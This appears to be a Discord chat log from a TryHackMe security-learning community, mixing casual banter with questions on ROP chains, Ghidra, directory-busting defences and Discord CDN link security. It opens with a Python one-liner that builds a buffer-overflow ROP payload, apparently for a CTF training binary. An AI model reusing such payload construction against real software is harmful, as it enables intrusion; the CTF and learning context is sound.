python3 -c "print((p:=__import__('pwn'),b'A'*44+b''.join([p.p32(0x080485aa)+p.p32(0x0804a020+n)+p.p32(ord(c))+p.p32(0x08048543)for n,c in enumerate('flag.txt\x00')])+b'\xd0\x83\x04\x08BBBB\x20\xa0\x04\x08')[1])"
``` go brrr

that hurts my eyes

ugh no

Guido van Rossum 😛

.

..

Is this the morse-code programming channel? 🤔

perhaps

beep beep beeeeeeep

$whoami

honestly

rop chains are so cool.. I think I might've found my new area of interest

Who is anyone anyway?

Computer having existential crisis

$whatami

$whereami

hey

3D modeling is truly a Rabbit Hole
If you hesitate between Cybersecurity VS 3d modeling
Choose Cybersecurity

Not for me, I’m dead set on cyber. A friend is interested in 3D and I figured someone in here had to be into it so I figured I would ask. Thanks for the help though 🙂

Gave +1 Rep to @lusty locust

Then that friend needs to learn...

• 3DS Max or Maya
• Substance Designer
• Substance Painter
• How to setup scenes in Unreal Engine 4

Expect 2-5 years of XP to get started

Oh noted noted thanks thanks I’ll research and help her thanks again man 🙂

That`s for environment art

For Characters...
Most of the work is done in Zbrush now

3d sculpting

3d art is HARD

and extremely competitive and time consuming

and demanding, jobwise

(burn out)

--
Blender is free, but it is not usually used in game studios.
The standards are 3ds max and maya

Rarely... MODO

Thanks thanks thanks

https://twitter.com/spotifyweird/status/1529062844939087872?s=21&t=o4ZtXL4M7_tduQ-jy_DWnw @quasi turtle

Lol 😁 alternative title: you are a dolphin enthusiast

Hello I have some doubts related to hacking can anyone please solve

https://tenor.com/view/star-wars-admiral-ackbar-its-a-trap-meme-gif-8125029

hi people...im new here🙋‍♂️

Hi New here, I'm Scrubz!

No, you're a muppet

Hey, it's #quiet-conversation, no exclamation marks 🤫

Did I miss some fun?

https://cdn.discordapp.com/attachments/145000612055089152/979298339063496724/unknown.png

and Muiri works to reinforce that

😂

Hello.

Everything makes sense now

is there a way to make ghidra interpret optcodes beyond a ret?

Since it's dead/unreachable code in Ghidra's eyes, it may not be the best tool for that. You're probably better off with Radare2 for the ROP Emporium stuff honestly.

(still think you should install pwndbg too) 😛

Highlight the opcodes with your mouse and press d

Thanks, both of you

hlo guys

https://twitter.com/YakuzaFriday/status/1530147259135959040?t=7rlYsAOqnbCY9bYd9Gh0lg&s=19

https://youtu.be/QqLbk-PmX2Q

food

#873642346762350592

oh, werps. I didn't know that was a channel. Or is that a thread, looks like thread icon

Oh okay it's a thread, I didn't see it cuz I wasn't joined

yeah thread, thought you might like 🙂

How to mitigate Weak ssl /tls key exchange ??? Windows server

Please make a basic effort to research before asking here...

Does anyone know how to pipe multiple lines of input into a program?

^without the use of pwntools

but it basically comes down to pwntools' p.recvline();p.sendline();p.recvline();p.sendline();...

just want a simpler command line util

Care to give an example of what you're trying to do?

Simpler than pwntools? You're spoiled :p 😉

I'm trying to exploit a buffer overflow vuln in a program that has number menus:

1) something
2) something else
3) exit
``` but I need to give 3 inputs

Lmao true... I'm looking for a oneliner approach

like bash piping but that's a mess with multiple inputs at once

Well your example is sending and receiving so it's reactive, what you have there is probably as close to a one liner as you're going to get. But if you don't need to send in between, you can just put newlines or whatever other break you need in the string itself.

oneliners are overrated in my opinion. I grew up in the perl community, I've seen enough of that breed of abuse 😉 They're useful when necessary, but I think you're better off making your code readable and re-usable if you have the option. Pwntools is great for that.

Just my two cents 🙂 But someone else may have a good answer for you. So I'll be off.

Hm alright

Could possibly do it with shell Python but that would be hellish

Bash isn't my strong suit

cat file.ext | while read line; do whatever $line; done

I'm struggling to grasp what you're looking for in my mind so I can't really write something for it

but preferably in a bash oneliner

Wait, what challenge is this from?

So.. we shouldn't be helping with these..?

fair point, but I already knew the answer

just wanted an alternative for these long exploit files

I keep finding myself in these painful scenarios during binexp and cba to make an entire exploit file

code re-use is your friend

build a template and adapt it to each scenario

doing it in bash will be much more work in my opinion

I know you said no pwntools but instead of repeating sendline and recvline, you can just use sendlineafter() and/or recvuntil() so you don’t have to guess how many lines

Don’t really know how you’d do it otherwise because of how the i/o stream seems to get handled

true, completely spaced that even though that's usually how I write mine.

How do hash identifiers work?

I don't assume their only variables are hash length and special format chars, right?

That's pretty much all there is to them

There's a principle called the random oracle, and it basically says you can't tell apart a hash from random data

Same thing with encrypted data

Ahhh so that's what an oracle is in crypto

If you picked up the humble bundle a way back, Ross J Anderson's security engineering book explains it well

The one from december?

Not sure, there's been a few

https://youtu.be/2XLZ4Z8LpEE

Based, guess i need a new setup as my old one is now featured as a very old machinery

Greetings, im new.

Greetings new, I'm potatoe

no clearly you're a burner smh

https://twitter.com/YakuzaFriday/status/1532705055559778305?t=JNeVd_8Pt1SPvZIqK_uybA&s=19

https://youtu.be/kZp3xSR4Uhc

am i able to implement tryhackme into my resume?

Seems like this would go in #cyber-and-careers

thank you

Can someone explain to me what the logic is behind not being able to redirect (using the Location header) to javascript:alert()?

Hello mods, can you please give me sec+ role when you have some time 🤓

+role @sacred sandal sec+

-role @sacred sandal sec+

reeeee

-arole 475611892627406859 sec+

GiveRole <User:Mention/ID> <Role:Role>

[-d d:Duration - Duration]

Invalid arguments provided: Invalid role mention or id

-arole 475611892627406859 sec+

GiveRole <User:Mention/ID> <Role:Role>

[-d d:Duration - Duration]

Invalid arguments provided: Invalid role mention or id

-arole 475611892627406859 Sec+

That user already has that role

stupid bot

I hate everything 😆

Thanks so much 🙏🏻

Gave +1 Rep to @odd acorn

Am I the only one who dislikes winedbg?

I really wish there were alternatives because I feel like a turtle laying on its back when I have to use winedbg

I'm comfortable af using gdb so it sucks that it doesnt have wine compatability or something

Windbg is ugly and hard to learn but very powerful when you master it. You can make it more readable with themes like this: https://github.com/nextco/windbg-readable-theme

Hmm aight

Oh

I was talking about wine``dbg

not windbg

winedbg is the debugger for wine: a linux PE execution framework thing

You could probably use a windows debugger on linux with enough modifications

Or maybe even get a remote debugging instance for some debuggers

hmm windbg is hard indeed (can't even figure out how to set a breakpoint)

can't find anything on it

I just dislike using wine in general. 90% of the time, if you're trying to run something meant for Windows, you should do it on Windows 🤷‍♂️

Same goes for compilation. 99% of the time it's gonna be easier to compile on the target platform

Cross-compiling is almost always an adventure into the 10th circle , Dependency Hell

been there, done that, bought the t-shirt, am still trying to escape

Hi, I need help

tbh wrong channel

I'm having an error in linux post, I can't ssh to shiba1 it says the password is wrong

#site-support

tks

i need help answering a question on one of the paths, what is the street of the kidnapper for digital forensics? ive been at this question for so long.

nevermind found it

For help with THM questions, please use the room help channels.

ok thanks.

hi, i just wanna know if one day we gonna have a black theme on THM website ?

(maybe i am wrong and its already possible)

Use dark reader

yeah that what i was going to do if there is no dark mode 🙂

I just close the lights in my room.

'' Dark mode ''

Are there mitigations for dir busting?

Best way I can come up with is IP banning users based on how many 404s they've activated but that's a bit witty

You could detect based on the amount of requests in a time period, but that can be bypassed by slowing down

fail2ban and rate limiting

you can maybe track 404s to an given ip

Dirbusting isn't the problem, the problem is what you'd find.

Hm fair point, but wouldn't that disturb the attackers' recon?

Which in turn makes it harder to find bugs/vulns*

fail2ban is normally failed logins or # of attempts per minute - does it even work on a web-based interface?

Sure, but it doesn't address the actual issue. Fix the problem, don't just paint over it and pretend it's not there

Yes, it's pretty customizable and can use a variety of logs and sources of ingest to build its rules.
It's also possible just within IPTables to rate-limit people, and within most web engines themselves, and within the database engines behind them, etc. etc. etc.

you can track via nginx

Question. When you post an image to a discord server, it stores the image on a CDN link. Anybody with this link can view my image on another server. How is this secure? https://cdn.discordapp.com/attachments/983959501067681805/983959517043785800/unknown.png

Is it because it's near impossible to brute force all those numbers and the filename in the URL?

I don’t figure it’s secure at all

well, goodluck sending 10^16 webrequests to discord to bruteforce all attachments

Thank you, I will need it.

Gave +1 Rep to @frail rapids

actually, that's server_id/message_id/filename

so you'd need to bruteforce filename as well

Security through obscurity sucks

https://tenor.com/view/pirates-of-the-carribean-jack-sparrow-johnny-depp-you-heard-of-me-famous-gif-4968261

Security through "the fact you'd never be able to fuzz that much" is not obscurity, it's why we use long key lengths. It's entropy. It's why UUIDs are fine in URLs for similar things.

The real questions are: Is it sequential or random? If random: Can the seed/step be calculated? Or can viable real results be pre-verified (think how the numeric code of a credit-card is mathematically verifiable.)

Basically is it either possible to predict the possibilities, or to calculate in some way to reduce the number of bad requests.

Part of the message ID embeds a unix timestamp

They're snowflake IDs, I think that's what Discord calls them

Yes, they're snowflakes

And ngl I don't think Discord actually care too much about you accessing other images

How does one get access to the fabled "Advanced General" chat? There's mention in the rules about either being top rank or having completed a network. Wreath counts towards that, right?

No, Wreath doesn't count because it's a beginner network

Oh, that's not specified in the rules.

chuckles I'm just nosy.

That should be updated lol, was made when only Throwback was the network

I guess I'll have to add that to the infinite list of challenges to tackle sooner than later.

https://tenor.com/view/dance-dance-boy-gif-23762739

If there was one infosec/VR skill you wanted to master, what would it be?

I'm kind of split in between binexp and webexp, but in practice I feel stuck in both. I don't know how I can break into real world projects as most of my experience is based on ctfs

I'm definitely split between binex and cryptography because those are the things I'm studying right now, but if you're using/learning from CTFs the right way, real world projects shouldn't be too intimidating.

If you're just running through challenges by copying and pasting commands you don't understand, yeah, the real world isn't like that. But, if you're doing a box, solving it, then going back through some of the source code to really make sure you understand what happened, you shouldn't have that kind of doubt 🤷‍♂️

I think they seen that people were sharing the links and said screw it lets leave it

Just imagine the people that for whatever reason send personal images of their ID for say and it somehow gets dug up

That would not be good lol

Daily reminder not to post stuff on the internet even if you think it's private

True

Yeah, about that...

Somewhere out there you can find a screenshot of my cards. And I mean all of my different types of cards. State ID, debit, credit, you name it, I got it.

😂

I’d have to go Cryptography and RE, both seems relaxing and cool, and both involve a “clear” solution once you have gotten it, also they both have so much math I just can’t hate it.

disagree with the relaxing bit imo

Crypto demands my full focus and RE is pain until you find the chain of things you needed to find, and then it feels like a weight has been lifted off of your shoulder

but I do like doing both anyway

They both have the most satisfying solves in cyber

And Cryptography does require focus but once you get the hang of it it’s really chill

They both feel more like Exploit Dev than other stuff in Cyber

But easier, like wayyy easier.

I'm messing with encrypted HTTPS traffic and I see the following

172.16.0.10 -> GET ... HTTPS/1.1 [length 119] -> 172.16.0.20
172.16.0.10 <- RESPONSE HTTPS/1.1 [length 118] <- 172.16.0.20
172.16.0.10 <- RESPONSE HTTPS/1.1 [length 40] <- 172.16.0.20

Packet 3 has a FIN flag. In what scenario and why would the webserver send a 2nd application data response (packet 3)?

A large piece of data could be it but I’m seeing that the packets are pretty small, could be a packet that got lost and resent, is that something possible in your case?

I don't think it's the latter. I have about ~13 of those webserver response sequences and they all have the same length and format

including that 2nd response with FIN

could it be that the webserver is down while the server (machine) is not?

fyi

It looks like it sends two packets every few seconds, and all are the same size, let me look it up rq

Maybe, it’s a webserver sending a video piece by piece, with a low bandwidth?

I probably should've sent both sides, but those are just the server responses

Here's an example of request and response

.10 is the client and .20 is the server

Are you sure it’s HTTPS?

Everything is fixed size

I think so. It's using DH with a http/1.1 and domainname string in it in the init phase

Is it all in the same sequence? The init and the packets

Yeah

Could if be that wireshark is messing up the separation of the packets?

Like the header and footer of the packets is somehow in the middle of the packets?

I don't think so. the metadata about the packets seem right

Something I find odd is that the checksum verification is disabled

Seems like they're all invalid when I enable it

@frail rapids do you have the pcap file? And your question is why is FIN sent?

My question was (more specifically: ) why there's a second response from the server

and yeah, I have the pcap

Can i have a look if it is alright with you? If it is not something confidential of course and you can share

Hello?

halo

hi

hi

Hello

hi

Hemnlo

I'm finally thirty-eighth in Italy!

Let'ss goooooo

Helloo

Does anyone want to start a conversation on how drones can be used for security in cyber security realm?

I am looking into how it can be used as an offensive security tool or aid, but it’s gotten nowhere

You mean as a weapon?

Oh yes that is a very nice topic!

I beilive it is a nice infiltration tool

how far can you go with free thm plan?

very very far

though the paths are not part of it... but you can do 2 networks and the advent of cyber rooms to learn a decent bit to start then move onto a lot of different topics

👍

80% ( I think ) of the content is free.

yeah, i read that somewhere too, though it didn't seem like it

thing is most of the hard and almost all insane rooms are free cuz most of them are community made, most of the easy info ones are site made and subbed :/

I see, thanks all

Most of the path content is paid, but there's a lot more to THM than just the paths

what's this "path" that everyone is refering to?

https://tryhackme.com/paths

https://tryhackme.com/hacktivities?tab=search This lets you search through all public content, rather than just the path content that's easy to find. You can filter by free/paid there

I'm doing paths from the very beggining

they are worth it @limber igloo, they teach all from the basics 🙂

Mhm

hi

What does the bot say when you try to verify?

#general is busy atm so things are getting burried

no worries man

Do you have multiple THM accounts? you can only link one thm account to your discord profile

i think i had another one or something but i have no freakin idea which one it is

is there a way for you guys to manually remove it ?

Yeah, I just need to verify that you own it. If I get the profile for what's already linked, would you be able to login to it on THM?

you mean my thm account im using right now?

The one that is linked to your discord account already

which is another account im not using correct ?

yeah

yea i dont quite remember which account that is though

If I get the URL to the profile would you recognise it to login?

Wait, if i get the 2nd account up and running can you move forward with things from there ?

yup - that would be handy(:

Cause i have a bunch of email and i need to reset the password for the 2nd account then

aight thank you very much ben, ill come back soon with the news

would it be fine if i ping you?

sure!

@grand hamlet mind if i drop a dm?

Please criticise my article

@hollow plank Can you post a non-medium link, please? 🙂

Ik someone on fb qith this name

Are u him with the weird stickman pf0

I am not on fb dude

Sure but why

Medium is a monetary platform, asking for criticism, while plausible, may be just for clicks.
I am presuming, yes:)

But this is where my presumptions come from. Total of 5 messages and you're just self promoting in them.

https://twitter.com/web3isgreat/status/1536173411210256385?s=21&t=G44GNAd8NA1FoKExfsJVYg

@primal steppe ^^^^

What's the point of removing MBR in wiper malware?

can't the bootloader be reinstalled and partition table be recovered (magic bytes of partition)?

Even if you have the ability to regain data from the disk i think there are sophisticated attacks that will prevent you to do that! By adding extra data to over write that!

Nice scam

Binance is doing it right now too

Love to see it :D

Is it a scam if the "real" financial sector already did it?

Not agreeing with this in any way

Yes (that's a scam too. someone using someone else to break into a car isn't an excuse to break into every car)

this must hurt (ETH)

I just saw someone recently who said they had all their non-retirement savings in ETH

stocks are fairly cyclical, crypto doesn't have enough time to determine if it will be

GG

Seeing this is better than any antidepressant.

wait, is that a meme or is it serious?

100% true.